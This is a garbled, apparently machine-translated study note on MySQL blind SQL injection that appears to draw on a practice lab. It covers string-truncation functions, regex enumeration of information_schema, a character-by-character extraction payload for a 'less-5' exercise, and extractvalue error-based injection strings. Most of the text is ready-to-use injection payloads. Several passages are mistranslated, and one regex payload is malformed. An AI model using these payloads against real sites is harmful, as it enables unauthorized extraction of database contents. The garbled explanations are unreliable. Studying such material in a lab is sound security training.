1. Based on the Boolean sql blind note-construction logic judgment
Three truncation functions
Mid() function
MID(database(),1,1)>'a' View the first place of the database name
MID(column_name,start,[length 】)
Note: length is optional and defaults to the remaining text;
The substr function
Substr() The substring() function achieves the same function, all of which are truncated strings.
substr(database(),1,)>'a' View the first place of the database name, start is the starting position, and length is the intercepted length.
The Left() function
gets the specified number of characters on the
left of the string left(string,n) srting is the string to be truncated, and n is the length.
left(database(),2)>'ab' View the top 2 digits of the database name
At the same time, we must also introduce the ORD() function. The ascii code of the first character returned by the second and the book is often used in combination with the above functions.
For example, ORD(MID(DATABASE(),1,1))>114
Regular expression attacks the
information in mysql5+-all the library names, table names, and field names are stored in the schema library. Therefore, the attack method is as follows:
1. Determine whether the first character of the first table name is a character in az, where blind_sqli is the library name assuming the same.
Note: 1 in the regular expression means that the starting character in the string is actually in the range of az
index.php?id=1 and 1=1=(select 1 from information_schema.tables where table_schema=“blind_sqli” ANd table_name REGEXP ' 2 ' limit 0 ,1)
2. Determine whether the first character is a character in an if it is not in oz
index.php?id=1 and 1=(select 1 from information_schema.tables where table_schema=“blind_sqli” AND table_name REGEXP '^[a-n[] limit 0,1)
After replacing the following expression:
expression The like the this: n-^ [AZ] -> NE [AZ] -> new new [AZ] -> News [AZ] -> FALSE
Then the only other tables
Experiments show that in the above expression, under llimit0,1, regexp will match all items including email and users under the security table. In fact, limit 0,1 is for where table_schema='security' limit 0 ,1. And table_schema='security' has already played a limiting role, so it doesn't matter whether there is limit or not.
less-5 blinds
Get the first character of the first table of the security database
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))%3E108-- +
Using this as a benchmark, keep repeating and recreating wheels
substr( ,2,1);
substr( ,3,1);
…
tips:
ASCII value:
az: 97-122
A-Z:65-90
0-9:48-57
Error injection
uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1